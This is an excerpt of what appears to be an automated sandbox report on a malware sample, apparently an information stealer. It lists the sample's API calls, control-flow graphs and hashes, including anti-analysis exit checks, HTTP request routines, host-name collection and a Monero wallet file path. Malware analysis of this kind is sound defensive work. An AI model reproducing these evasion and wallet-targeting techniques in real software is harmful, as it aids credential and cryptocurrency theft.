                        • GetProcAddress.KERNEL32(6F060000,008962C0), ref: 00F1A5DA
                        • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00F1A5F1
                        • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00F1A607
                        • GetProcAddress.KERNEL32(74E00000,008AD620), ref: 00F1A629
                        • GetProcAddress.KERNEL32(74E00000,008A9810), ref: 00F1A641
                        • GetProcAddress.KERNEL32(74E00000,008AD758), ref: 00F1A659
                        • GetProcAddress.KERNEL32(74E00000,008AD788), ref: 00F1A672
                        • GetProcAddress.KERNEL32(74DF0000,00896480), ref: 00F1A693
                        • GetProcAddress.KERNEL32(6D090000,008AD8A8), ref: 00F1A6B4
                        • GetProcAddress.KERNEL32(6D090000,008964A0), ref: 00F1A6CD
                        • GetProcAddress.KERNEL32(6D090000,008AD800), ref: 00F1A6E5
                        • GetProcAddress.KERNEL32(6D090000,008AD7A0), ref: 00F1A6FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: HttpQueryInfoA$InternetSetOptionA
                        • API String ID: 2238633743-1775429166
                        • Opcode ID: cbc74cc019dc5055838830eb8849f919c807d47039f91f9722eef34ab1e9bfe9
                        • Instruction ID: d0adf72fde795fb16ae99b6fb57ce951a74055e3457d076d50c44c33384c6056
                        • Opcode Fuzzy Hash: cbc74cc019dc5055838830eb8849f919c807d47039f91f9722eef34ab1e9bfe9
                        • Instruction Fuzzy Hash: 39622EBD5C06019FE37CDFA8F5989563BF9EF88A12316453AA627C320CD63A94C1DB50
                        Function 00F06280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1033 f06280-f0630b call f1a7a0 call f047b0 call f1a740 InternetOpenA StrCmpCA 1040 f06314-f06318 1033->1040 1041 f0630d 1033->1041 1042 f06509-f06525 call f1a7a0 call f1a800 * 2 1040->1042 1043 f0631e-f06342 InternetConnectA 1040->1043 1041->1040 1061 f06528-f0652d 1042->1061 1044 f06348-f0634c 1043->1044 1045 f064ff-f06503 InternetCloseHandle 1043->1045 1047 f0635a 1044->1047 1048 f0634e-f06358 1044->1048 1045->1042 1051 f06364-f06392 HttpOpenRequestA 1047->1051 1048->1051 1053 f064f5-f064f9 InternetCloseHandle 1051->1053 1054 f06398-f0639c 1051->1054 1053->1045 1056 f063c5-f06405 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 f0639e-f063bf InternetSetOptionA 1054->1057 1059 f06407-f06427 call f1a740 call f1a800 * 2 1056->1059 1060 f0642c-f0644b call f18940 1056->1060 1057->1056 1059->1061 1067 f064c9-f064e9 call f1a740 call f1a800 * 2 1060->1067 1068 f0644d-f06454 1060->1068 1067->1061 1071 f06456-f06480 InternetReadFile 1068->1071 1072 f064c7-f064ef InternetCloseHandle 1068->1072 1076 f06482-f06489 1071->1076 1077 f0648b 1071->1077 1072->1053 1076->1077 1080 f0648d-f064c5 call f1a9b0 call f1a8a0 call f1a800 1076->1080 1077->1072 1080->1071
                        APIs
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                          • Part of subcall function 00F047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F04839
                          • Part of subcall function 00F047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F04849
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        • InternetOpenA.WININET(00F20DFE,00000001,00000000,00000000,00000000), ref: 00F062E1
                        • StrCmpCA.SHLWAPI(?,008AF278), ref: 00F06303
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F06335
                        • HttpOpenRequestA.WININET(00000000,GET,?,008AE690,00000000,00000000,00400100,00000000), ref: 00F06385
                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F063BF
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F063D1
                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00F063FD
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00F0646D
                        • InternetCloseHandle.WININET(00000000), ref: 00F064EF
                        • InternetCloseHandle.WININET(00000000), ref: 00F064F9
                        • InternetCloseHandle.WININET(00000000), ref: 00F06503
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                        • String ID: ERROR$ERROR$GET
                        • API String ID: 3749127164-2509457195
                        • Opcode ID: 757983606dad2cfbd85b9b60d82cf24da3b3b90c20e75c6fafeb6c3499b3eda6
                        • Instruction ID: 9d8cfa32cf8321917628fc5c32f28f8d3d35766ebcee8ce4dd64ba7ef039ed7d
                        • Opcode Fuzzy Hash: 757983606dad2cfbd85b9b60d82cf24da3b3b90c20e75c6fafeb6c3499b3eda6
                        • Instruction Fuzzy Hash: E3716F75A40218ABEB24DFA0DC49BEE7778FF44710F108158F10AAB1C4DBB56A85EF51
                        Function 00F15510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1090 f15510-f15577 call f15ad0 call f1a820 * 3 call f1a740 * 4 1106 f1557c-f15583 1090->1106 1107 f15585-f155b6 call f1a820 call f1a7a0 call f01590 call f151f0 1106->1107 1108 f155d7-f1564c call f1a740 * 2 call f01590 call f152c0 call f1a8a0 call f1a800 call f1aad0 StrCmpCA 1106->1108 1123 f155bb-f155d2 call f1a8a0 call f1a800 1107->1123 1134 f15693-f156a9 call f1aad0 StrCmpCA 1108->1134 1138 f1564e-f1568e call f1a7a0 call f01590 call f151f0 call f1a8a0 call f1a800 1108->1138 1123->1134 1139 f157dc-f15844 call f1a8a0 call f1a820 * 2 call f01670 call f1a800 * 4 call f16560 call f01550 1134->1139 1140 f156af-f156b6 1134->1140 1138->1134 1269 f15ac3-f15ac6 1139->1269 1142 f157da-f1585f call f1aad0 StrCmpCA 1140->1142 1143 f156bc-f156c3 1140->1143 1162 f15991-f159f9 call f1a8a0 call f1a820 * 2 call f01670 call f1a800 * 4 call f16560 call f01550 1142->1162 1163 f15865-f1586c 1142->1163 1146 f156c5-f15719 call f1a820 call f1a7a0 call f01590 call f151f0 call f1a8a0 call f1a800 1143->1146 1147 f1571e-f15793 call f1a740 * 2 call f01590 call f152c0 call f1a8a0 call f1a800 call f1aad0 StrCmpCA 1143->1147 1146->1142 1147->1142 1245 f15795-f157d5 call f1a7a0 call f01590 call f151f0 call f1a8a0 call f1a800 1147->1245 1162->1269 1168 f15872-f15879 1163->1168 1169 f1598f-f15a14 call f1aad0 StrCmpCA 1163->1169 1175 f158d3-f15948 call f1a740 * 2 call f01590 call f152c0 call f1a8a0 call f1a800 call f1aad0 StrCmpCA 1168->1175 1176 f1587b-f158ce call f1a820 call f1a7a0 call f01590 call f151f0 call f1a8a0 call f1a800 1168->1176 1198 f15a16-f15a21 Sleep 1169->1198 1199 f15a28-f15a91 call f1a8a0 call f1a820 * 2 call f01670 call f1a800 * 4 call f16560 call f01550 1169->1199 1175->1169 1274 f1594a-f1598a call f1a7a0 call f01590 call f151f0 call f1a8a0 call f1a800 1175->1274 1176->1169 1198->1106 1199->1269 1245->1142 1274->1169
                        APIs
                          • Part of subcall function 00F1A820: lstrlen.KERNEL32(00F04F05,?,?,00F04F05,00F20DDE), ref: 00F1A82B
                          • Part of subcall function 00F1A820: lstrcpy.KERNEL32(00F20DDE,00000000), ref: 00F1A885
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F15644
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F156A1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F15857
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                          • Part of subcall function 00F151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F15228
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                          • Part of subcall function 00F152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F15318
                          • Part of subcall function 00F152C0: lstrlen.KERNEL32(00000000), ref: 00F1532F
                          • Part of subcall function 00F152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00F15364
                          • Part of subcall function 00F152C0: lstrlen.KERNEL32(00000000), ref: 00F15383
                          • Part of subcall function 00F152C0: lstrlen.KERNEL32(00000000), ref: 00F153AE
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F1578B
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F15940
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F15A0C
                        • Sleep.KERNEL32(0000EA60), ref: 00F15A1B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen$Sleep
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 507064821-2791005934
                        • Opcode ID: 0a15205f3650107598d7f6f3933d81f9bb9fac2180217eae4b7afa904f10fddb
                        • Instruction ID: c3c62e42bbe7a9f735ae820c59eb25543e76186791cc0ef00e3f6855e499408d
                        • Opcode Fuzzy Hash: 0a15205f3650107598d7f6f3933d81f9bb9fac2180217eae4b7afa904f10fddb
                        • Instruction Fuzzy Hash: ACE145769111049BCB18FBA0ED52EFD7338AF54720F408128B517570D5EF38AB8AEB92
                        Function 00F117A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1301 f117a0-f117cd call f1aad0 StrCmpCA 1304 f117d7-f117f1 call f1aad0 1301->1304 1305 f117cf-f117d1 ExitProcess 1301->1305 1309 f117f4-f117f8 1304->1309 1310 f119c2-f119cd call f1a800 1309->1310 1311 f117fe-f11811 1309->1311 1313 f11817-f1181a 1311->1313 1314 f1199e-f119bd 1311->1314 1316 f118f1-f11902 StrCmpCA 1313->1316 1317 f11951-f11962 StrCmpCA 1313->1317 1318 f11970-f11981 StrCmpCA 1313->1318 1319 f11913-f11924 StrCmpCA 1313->1319 1320 f11932-f11943 StrCmpCA 1313->1320 1321 f11835-f11844 call f1a820 1313->1321 1322 f1185d-f1186e StrCmpCA 1313->1322 1323 f1187f-f11890 StrCmpCA 1313->1323 1324 f11821-f11830 call f1a820 1313->1324 1325 f11849-f11858 call f1a820 1313->1325 1326 f118ad-f118be StrCmpCA 1313->1326 1327 f118cf-f118e0 StrCmpCA 1313->1327 1328 f1198f-f11999 call f1a820 1313->1328 1314->1309 1338 f11904-f11907 1316->1338 1339 f1190e 1316->1339 1344 f11964-f11967 1317->1344 1345 f1196e 1317->1345 1347 f11983-f11986 1318->1347 1348 f1198d 1318->1348 1340 f11930 1319->1340 1341 f11926-f11929 1319->1341 1342 f11945-f11948 1320->1342 1343 f1194f 1320->1343 1321->1314 1330 f11870-f11873 1322->1330 1331 f1187a 1322->1331 1332 f11892-f1189c 1323->1332 1333 f1189e-f118a1 1323->1333 1324->1314 1325->1314 1334 f118c0-f118c3 1326->1334 1335 f118ca 1326->1335 1336 f118e2-f118e5 1327->1336 1337 f118ec 1327->1337 1328->1314 1330->1331 1331->1314 1353 f118a8 1332->1353 1333->1353 1334->1335 1335->1314 1336->1337 1337->1314 1338->1339 1339->1314 1340->1314 1341->1340 1342->1343 1343->1314 1344->1345 1345->1314 1347->1348 1348->1314 1353->1314
                        APIs
                        • StrCmpCA.SHLWAPI(00000000,block), ref: 00F117C5
                        • ExitProcess.KERNEL32 ref: 00F117D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: 7f6a6cabf7c258eaffa67b5d1fbbe7d701c9b6ca3031198a3c13f65ae7bb7f5e
                        • Instruction ID: 91bf6e679751f9cf91501c76887a2e9a150de4423e41b1d70038a94d9b1b57ef
                        • Opcode Fuzzy Hash: 7f6a6cabf7c258eaffa67b5d1fbbe7d701c9b6ca3031198a3c13f65ae7bb7f5e
                        • Instruction Fuzzy Hash: 10518EB5A00209EFDB04DFA0E964BFE77B5FF44700F508058E526A7240DB74E981EB62
                        Function 00F17500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1356 f17500-f1754a GetWindowsDirectoryA 1357 f17553-f175c7 GetVolumeInformationA call f18d00 * 3 1356->1357 1358 f1754c 1356->1358 1365 f175d8-f175df 1357->1365 1358->1357 1366 f175e1-f175fa call f18d00 1365->1366 1367 f175fc-f17617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1368 f17619-f17626 call f1a740 1367->1368 1369 f17628-f17658 wsprintfA call f1a740 1367->1369 1377 f1767e-f1768e 1368->1377 1369->1377
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00F17542
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F1757F
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F17603
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F1760A
                        • wsprintfA.USER32 ref: 00F17640
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                        • String ID: :$C$\
                        • API String ID: 1544550907-3809124531
                        • Opcode ID: 4868b3d3f938ace312d163163fd3437aac52f44618b1ef7f2e19392a92359907
                        • Instruction ID: 25100e7074a4dbbf9e3167006d84242645b4bca9cdb35ef9a59bb1edc64d94e8
                        • Opcode Fuzzy Hash: 4868b3d3f938ace312d163163fd3437aac52f44618b1ef7f2e19392a92359907
                        • Instruction Fuzzy Hash: 1141B1B5D44348ABDB24DF94DC45BEEBBB8EF18710F100098F50967280DB79AB84DBA5
                        Function 00F169F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,008A14E0), ref: 00F198A1
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,008A16D8), ref: 00F198BA
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,008A16F0), ref: 00F198D2
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,008A1708), ref: 00F198EA
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,008A1558), ref: 00F19903
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,008A97F0), ref: 00F1991B
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,00896900), ref: 00F19933
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,00896740), ref: 00F1994C
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,008A1720), ref: 00F19964
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,008A1738), ref: 00F1997C
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,008A1780), ref: 00F19995
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,008A1798), ref: 00F199AD
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,00896700), ref: 00F199C5
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,008A17B0), ref: 00F199DE
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F011D0: ExitProcess.KERNEL32 ref: 00F01211
                          • Part of subcall function 00F01160: GetSystemInfo.KERNEL32(?), ref: 00F0116A
                          • Part of subcall function 00F01160: ExitProcess.KERNEL32 ref: 00F0117E
                          • Part of subcall function 00F01110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00F0112B
                          • Part of subcall function 00F01110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00F01132
                          • Part of subcall function 00F01110: ExitProcess.KERNEL32 ref: 00F01143
                          • Part of subcall function 00F01220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00F0123E
                          • Part of subcall function 00F01220: ExitProcess.KERNEL32 ref: 00F01294
                          • Part of subcall function 00F16770: GetUserDefaultLangID.KERNEL32 ref: 00F16774
                          • Part of subcall function 00F01190: ExitProcess.KERNEL32 ref: 00F011C6
                          • Part of subcall function 00F17850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F011B7), ref: 00F17880
                          • Part of subcall function 00F17850: RtlAllocateHeap.NTDLL(00000000), ref: 00F17887
                          • Part of subcall function 00F17850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F1789F
                          • Part of subcall function 00F178E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F17910
                          • Part of subcall function 00F178E0: RtlAllocateHeap.NTDLL(00000000), ref: 00F17917
                          • Part of subcall function 00F178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00F1792F
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008A9830,?,00F2110C,?,00000000,?,00F21110,?,00000000,00F20AEF), ref: 00F16ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F16AE8
                        • CloseHandle.KERNEL32(00000000), ref: 00F16AF9
                        • Sleep.KERNEL32(00001770), ref: 00F16B04
                        • CloseHandle.KERNEL32(?,00000000,?,008A9830,?,00F2110C,?,00000000,?,00F21110,?,00000000,00F20AEF), ref: 00F16B1A
                        • ExitProcess.KERNEL32 ref: 00F16B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                        • String ID:
                        • API String ID: 2931873225-0
                        • Opcode ID: 7360e7f6d6e2321f725d2c5c11ccd3ee6e7f74f234eec841ea9209dca22a5134
                        • Instruction ID: add0297a09e081f325b06b2c9059c3b8c94ccad3646c79a2b32f7cc5bfc57e53
                        • Opcode Fuzzy Hash: 7360e7f6d6e2321f725d2c5c11ccd3ee6e7f74f234eec841ea9209dca22a5134
